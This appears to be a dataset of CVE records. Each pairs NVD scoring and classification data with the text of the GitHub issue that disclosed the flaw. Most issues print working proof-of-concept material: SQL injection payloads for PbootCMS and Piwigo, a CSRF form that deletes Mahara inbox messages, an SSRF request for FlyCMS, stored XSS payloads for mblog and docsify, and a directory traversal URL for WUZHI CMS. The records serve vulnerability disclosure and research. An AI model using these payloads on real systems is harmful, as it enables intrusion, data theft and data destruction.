2020-11-12T12:39:35Z
2020-12-11T21:41:09Z
https://github.com/upx/upx/issues/421
741,567,149
421
1,779
CVE-2021-28245
2021-03-31T14:15:20.127
PbootCMS 3.0.4 contains a SQL injection vulnerability through index.php via the search parameter that can reveal sensitive information through adding an admin account.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/M40k1n9/vulner/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/M40k1n9/vulner/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pbootcms:pbootcms:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "2F9CE3D8-2936-4481-ABDE-142A22D10678", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/M40k1n9/vulner/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "M40k1n9", "vulner" ]
# PbootCMS 3.0.4 has SQL injection ## Submitter name : ## Vulnerability Type : SQL Injection ## Vulnerability Version : 3.0.4 ## Recurring environment: * Windows 10 * PHP 5.4.5 * Apache 2.4.23 * Mysql 5.6.27 ## Vulnerability Description AND recurrence: The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: pbootcms\static\backup\sql\0cb2353f8ea80b398754308f15d1121e_20200705235534_pbootcms.sql ![image](https://github.com/M40k1n9/vulner/blob/main/img/1.png?raw=true) Boolean-based blind SQL injection happened in this page. '$_ POST' sends an index array. The values in the array are brought into the "where" condition in the form of "and". ![image](https://github.com/M40k1n9/vulner/blob/main/img/1.png?raw=true) When the condition is true: ![image](https://github.com/M40k1n9/vulner/blob/main/img/2.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/3.png?raw=true) When the condition is false: ![image](https://github.com/M40k1n9/vulner/blob/main/img/4.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/5.png?raw=true) payload: Because the data is filtered, only 'regexp' can be used for regular matching. For example: "username = admin" can be expressed as "username regepx 0x5E612E2A", where "5E612E2A" is the hex code of "^ a. *" ![image](https://github.com/M40k1n9/vulner/blob/main/img/6.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/7.png?raw=true) and we can get the admin account name and password Detailed information: 1: Vulnerability code:core\basic\Model.php ![image](https://github.com/M40k1n9/vulner/blob/main/img/8.png?raw=true) When the passed in parameter $where is an array, traverse the array, and when $where is an index array:$where_string.=$value。 2:Find the code to pass in the ‘where’ function as an index array: Route:apps\home\controller\ParserController.php In 'parserSearchLabel()', the incoming data is assigned to the variable "$receive" for traversal, and "$key" is brought into "request()" for filtering. ![image](https://github.com/M40k1n9/vulner/blob/main/img/9.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/10.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/11.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/12.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/13.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/14.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/15.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/16.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/17.png?raw=true) The values of the index array passed in through the above methods can only contain Chinese, letters, numbers, horizontal lines, dots, commas and spaces! It is encoded by 'htmlspecialchars()' and 'addslashes()'. Finally, it is passed to '$where3'. ![image](https://github.com/M40k1n9/vulner/blob/main/img/18.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/19.png?raw=true) ![image](https://github.com/M40k1n9/vulner/blob/main/img/20.png?raw=true) The '$where3' in 'getlists()' is controllable, and it will be brought into the statement in the form of 'and'.
pbootcms
https://api.github.com/repos/M40k1n9/vulner/issues/1/comments
0
2021-03-09T07:34:55Z
2022-03-16T16:25:07Z
https://github.com/M40k1n9/vulner/issues/1
825,454,552
1
1,780
CVE-2021-29349
2021-03-31T23:15:11.827
Mahara 20.10 is affected by Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a module/multirecipientnotification/inbox.php pieform_delete_all_notifications request, which leads to removing all messages from a mailbox.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/0xBaz/CVE-2021-29349/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/0xBaz/CVE-2021-29349/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mahara:mahara:20.10:*:*:*:*:*:*:*", "matchCriteriaId": "39EBBE51-0365-49FD-9504-C42AC8EA8477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/0xBaz/CVE-2021-29349/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "0xBaz", "CVE-2021-29349" ]
**Product** : Mahara 20.10 **Description**: Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft the /inbox.php directory, which leads to removing all messages from a mailbox. **Video POC** : [Google Drive Video](https://drive.google.com/file/d/1bMQXuqDAJQHI7a91INfDD3ypJ7bG0Rk-/view?usp=sharing) **POC** : ``` /* Email Box Exploit - CSRF */ <!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body, html { height: 100%; margin: 0; } .bg { /* The image used */ background-image: url("https://avatars.githubusercontent.com/u/78818477?s=400&u=b18f9de63b3df28e6e1b4d2dc64303048aa5f5b5&v=4"); /* Full height */ height: 100%; /* Center and scale the image nicely */ background-position: center; background-repeat: no-repeat; background-size: cover; } </style> </head> <body> <div class="bg"></div> <p>CSRF CVE-2021-29349 , After clicking below button all inbox maill messages will be deleted !!.</p> </body> <form enctype="multipart/form-data" method="POST" action="https://demo.mahara.org/module/multirecipientnotification/inbox.php"><table><input type hidden="text" value="Delete+all+notifications" name="submit"> <input type hidden="text" value="all" name="type"> <input type hidden="text" value="L8T0C4WDuMxzakwV" name="sesskey"> <input type hidden="text" value="" name="pieform_delete_all_notifications"> </table><input type="submit" value="Click to View Next Page"></form> </html> ``` **Recommendations** : 1- Implement` X-CSRF-TOKEN` and make sure it's validating in back-end server as well 2- Implement an interceptor which appends token value to every (state-changing) request in custom request header `X-XSRF-TOKEN-B`
CVE-2021-29349
https://api.github.com/repos/0xBaz/CVE-2021-29349/issues/1/comments
0
2021-03-31T20:04:33Z
2021-03-31T20:40:18Z
https://github.com/0xBaz/CVE-2021-29349/issues/1
847,245,676
1
1,781
CVE-2020-19613
2021-04-01T19:15:13.153
Server Side Request Forgery (SSRF) vulnerability in saveUrlAs function in ImagesService.java in sunkaifei FlyCMS version 20190503.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sunkaifei/FlyCms/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sunkaifei/FlyCms/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flycms_project:flycms:20190503:*:*:*:*:*:*:*", "matchCriteriaId": "17576AE7-69E2-45E5-8AB8-AE06CF88D2B0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/sunkaifei/FlyCms/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sunkaifei", "FlyCms" ]
An issue was discovered in FlyCms. There is a security vulnerability in file `/Users/bang/code/java/FlyCms-master/src/main/java/com/flycms/module/question/service/ImagesService.java`, in saveUrlAs() function, result in a SSRF . SSRF ­ Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet. ### POC ```%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E``` Send the request is as follows: ``` POST /ucenter/question/add HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/question/add Content-Length: 93 Cookie: CFID=3; CFTOKEN=50139797; ECS[visit_times]=1; bgC_sid=P5rfbe; JSESSIONID=node01jp6c3qjsftrz1xa81ovh47bff0.node0; Hm_lvt_2f24154b3f87697d36a4e2a638b68aaa=1560325064; Hm_lpvt_2f24154b3f87697d36a4e2a638b68aaa=1560328852; FlyCmsId=593f391df8a70cab630e34efa645c590 Connection: close title=ssrf10&content=%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E&tags=ssrf7&price=0 ``` ![image](https://user-images.githubusercontent.com/39006839/59338910-d05c3e00-8d35-11e9-8ac3-f2ad410b38bf.png) We can see that it will call replaceContent to fetch remote image when add a question. ![image](https://user-images.githubusercontent.com/39006839/59339156-3a74e300-8d36-11e9-9ae0-0fb79dc6437d.png) In funtion replaceContent,we can use `127.1` bypass reg or request other url directly,and saveUrlAs is called here. ![image](https://user-images.githubusercontent.com/39006839/59339332-90498b00-8d36-11e9-917b-7da464c7f482.png) Finally `HttpURLConnection` result in SSRF. ![image](https://user-images.githubusercontent.com/39006839/59339648-28e00b00-8d37-11e9-8770-37cfc6554980.png) Still in replaceContent, we can find the file path, file name.The addQuesion finally failed, but file will create. File path is the date tody, example `/upload/content/2019/6/12/` File name is concat md5(date + filenum) + filenum + extension ![image](https://user-images.githubusercontent.com/39006839/59341221-0e5b6100-8d3a-11e9-8ca1-0e47b6865cbc.png) md5 16 result is 8-24 of md5_32 resulst. ![image](https://user-images.githubusercontent.com/39006839/59341305-3ba80f00-8d3a-11e9-806c-11546cfa1a03.png) And we can get server time from response, after convert timezone, we can caculate the result. ![image](https://user-images.githubusercontent.com/39006839/59341424-66926300-8d3a-11e9-8772-0d5a6355c96a.png) so filename is `43EC4555543DEFC6_0.`,absolute path is `/upload/content/2019/6/12/43EC4555543DEFC6_0.` Request the path we can download file named `43EC4555543DEFC6_0.`. ![image](https://user-images.githubusercontent.com/39006839/59341693-e6203200-8d3a-11e9-87fd-297f21150f2c.png) It's SSRF result.
There is a SSRF vulnerability
https://api.github.com/repos/sunkaifei/FlyCms/issues/1/comments
0
2019-06-12T09:54:51Z
2019-06-12T09:54:51Z
https://github.com/sunkaifei/FlyCms/issues/1
455,118,912
1
1,782
CVE-2020-19616
2021-04-01T19:15:13.217
Cross Site Scripting (XSS) vulnerability in mblog 3.5 via the post header field to /post/editing.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/langhsu/mblog/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/langhsu/mblog/issues/27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mblog_project:mblog:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A8A4AC9-1036-4891-B425-6977D8238247", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/langhsu/mblog/issues/27
[ "Exploit", "Third Party Advisory" ]
github.com
[ "langhsu", "mblog" ]
A xss vulnerability was discovered in mblog. In mblog3.5, stored XSS exists via the `/post/editing` value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ``` xss payload: <img src=x onerror=alert(1)> ``` ![image](https://user-images.githubusercontent.com/39006839/59480292-a8ceb800-8e92-11e9-811d-49662a3ef887.png) ![image](https://user-images.githubusercontent.com/39006839/59480359-e16e9180-8e92-11e9-8d60-ab4a403b2088.png) Another stored XSS exists via the `/settings/profile` value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ``` xss payload: <img src=x onerror=alert(1)> ``` ![image](https://user-images.githubusercontent.com/39006839/59480467-4629ec00-8e93-11e9-91ce-4062dd0f9a1d.png) ![image](https://user-images.githubusercontent.com/39006839/59480548-999c3a00-8e93-11e9-9fbd-71074861a2e7.png) ![image](https://user-images.githubusercontent.com/39006839/59480526-88ebc400-8e93-11e9-8dae-c8e90246bbfd.png)
There are two stored XSS vulnerability
https://api.github.com/repos/langhsu/mblog/issues/27/comments
0
2019-06-14T03:01:27Z
2019-06-14T03:01:27Z
https://github.com/langhsu/mblog/issues/27
456,038,538
27
1,783
CVE-2021-27973
2021-04-02T19:15:20.880
SQL injection exists in Piwigo before 11.4.0 via the language parameter to admin.php?page=languages.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162404/Piwigo-11.3.0-SQL-Injection.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1352" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162404/Piwigo-11.3.0-SQL-Injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1352" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "CE6825BB-C574-480F-92B6-5A7D8E70BFD9", "versionEndExcluding": "11.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Piwigo/Piwigo/issues/1352
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
1. Login with admin or users can set the language; 2. Send the following payload and follow redirect: db user :http://xxx/admin.php?page=languages&language=zh_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(user()))%2C0)%20or%20%27&action=activate ![image](https://user-images.githubusercontent.com/59224242/109492597-2d79c380-7ac6-11eb-8f70-aadc9c82e5e8.png) db version:http://127.0.0.1/admin.php?page=languages&language=zh_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate ![image](https://user-images.githubusercontent.com/59224242/109492715-5b5f0800-7ac6-11eb-9d8f-58aead973640.png)
SQL injection in settings-language in version 11.3.0
https://api.github.com/repos/Piwigo/Piwigo/issues/1352/comments
0
2021-03-01T11:44:16Z
2021-03-08T13:59:50Z
https://github.com/Piwigo/Piwigo/issues/1352
818,783,675
1,352
1,784
CVE-2020-21590
2021-04-02T20:15:12.567
Directory traversal in coreframe/app/template/admin/index.php in WUZHI CMS 4.1.0 allows attackers to list files in arbitrary directories via the dir parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pwnninja/wuzhicms/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pwnninja/wuzhicms/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/wuzhicms/wuzhicms/issues/190
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
A directory traversal vulnerability was discovered in WUZHI CMS 4.1.0. There is a directory traversal vulnerability which allows authenticated remote attackers to list files in arbitrary directory. Vulnerability in /coreframe/app/template/admin/index.php: ```php private $db; function __construct() { $this->db = load_class('db'); $this->dir = isset($GLOBALS['dir']) && trim($GLOBALS['dir']) ? str_replace(array('..\\', '../', './', '.\\'), '', trim($GLOBALS['dir'])) : ''; $this->dir = str_ireplace( array('%2F','//'),'/',$this->dir); } public function listing() { $dir = $this->dir; $lists = glob(TPL_ROOT.$dir.'/'.'*'); //if(!empty($lists)) rsort($lists); $cur_dir = str_replace(array( COREFRAME_ROOT ,DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR), array('',DIRECTORY_SEPARATOR), TPL_ROOT.$dir.'/'); $show_dialog = 1; include $this->template('listing'); } ``` When str_replace() is called, the transformation of input data is as follows: /...../// -> /...// -> /../ Exploit: `http://127.0.0.1/wuzhicms/www/index.php?dir=/.....///.....///.....///.....///&m=template&f=index&v=listing&_su=wuzhicms&_menuid=31` <img width="726" alt="捕获" src="https://user-images.githubusercontent.com/26854307/76695420-11fd8900-66ba-11ea-9583-1d789ca0c0e4.PNG">
wuzhicms v4.1.0 /coreframe/app/template/admin/index.php directory traversal vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/190/comments
0
2020-03-15T04:29:26Z
2020-03-15T04:40:18Z
https://github.com/wuzhicms/wuzhicms/issues/190
581,507,883
190
1,785
CVE-2021-30074
2021-04-02T21:15:13.653
docsify 4.12.1 is affected by Cross Site Scripting (XSS) because the search component does not appropriately encode Code Blocks and mishandles the " character.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/docsifyjs/docsify/issues/1549" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/docsifyjs/docsify/issues/1549" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:docsifyjs:docsify:4.12.1:*:*:*:*:*:*:*", "matchCriteriaId": "4DC3B6BD-86F8-45B8-A892-12124845ED05", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/docsifyjs/docsify/issues/1549
[ "Exploit", "Third Party Advisory" ]
github.com
[ "docsifyjs", "docsify" ]
<!-- Please don't delete this template or we'll close your issue --> <!-- Please use English language --> <!-- Before creating an issue please make sure you are using the latest version of Docsify. --> <!-- Please ask questions on StackOverflow: https://stackoverflow.com/questions/ask?tags=docsify --> <!-- Please ask questions on Discord: https://discord.gg/3NwKFyR --> ## Bug Report #### Steps to reproduce ##### 1. create a simple docsify project file tree ``` . ├── README.md ├── _sidebar.md ├── index.html └── test └── xss.md ``` index.html ``` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>test</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="description" content="Description"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/docsify/lib/themes/vue.css"> <link rel="stylesheet" href="/css/sidebar.css"> </head> <body> <div id="app"></div> <script> window.$docsify = { loadSidebar: true, homepage: './README.md', alias:{ '/.*/_sidebar.md': '/_sidebar.md', }, autoHeader: true, auto2top: true, search: { noData: { '/': 'No results!' }, paths: 'auto', placeholder: { '/': 'Search' }, hideOtherSidebarContent: true, depth: 1 }, name: 'test', } </script> <script src="//cdn.jsdelivr.net/npm/docsify/lib/docsify.min.js"></script> <script src="//cdn.jsdelivr.net/npm/docsify/lib/plugins/search.js"></script> </body> </html> ``` xss.md ``` # xss test xss"><img src=1 onerror=alert(1)><" ``` _sidebar.md ``` - Test - [xss](./test/xss.md) ``` ##### 2. start a http server ![image](https://user-images.githubusercontent.com/30471149/113081487-57c8b900-920b-11eb-8099-d71c6ea61f0b.png) ![image](https://user-images.githubusercontent.com/30471149/113082103-6fed0800-920c-11eb-84cc-e11057ddba33.png) when user search something near XSS payload and the javascript which should rendering as markdown will be execute ##### 3. input `x` in search filed ![image](https://user-images.githubusercontent.com/30471149/113081528-6d3de300-920b-11eb-8a75-320d058e59a9.png) #### What is current behaviour #### What is the expected behaviour #### Other relevant information <!-- (Update "[ ]" to "[x]" to check a box) --> - [ ] Bug does still occur when all/other plugins are disabled? - Your OS: Mac OS - Node.js version: v12.19.0 - npm/yarn version: - Browser version: - Docsify version: 4.12.1 - Docsify plugins: search.js <!-- Love docsify? Please consider supporting our collective: 👉 https://opencollective.com/docsify/donate --> #### Please create a reproducible sandbox https://xl9pw.csb.app/ #### Mention the docsify version in which this bug was not present (if any)
search.js v4.12.1 Cross-Site Scripting
https://api.github.com/repos/docsifyjs/docsify/issues/1549/comments
5
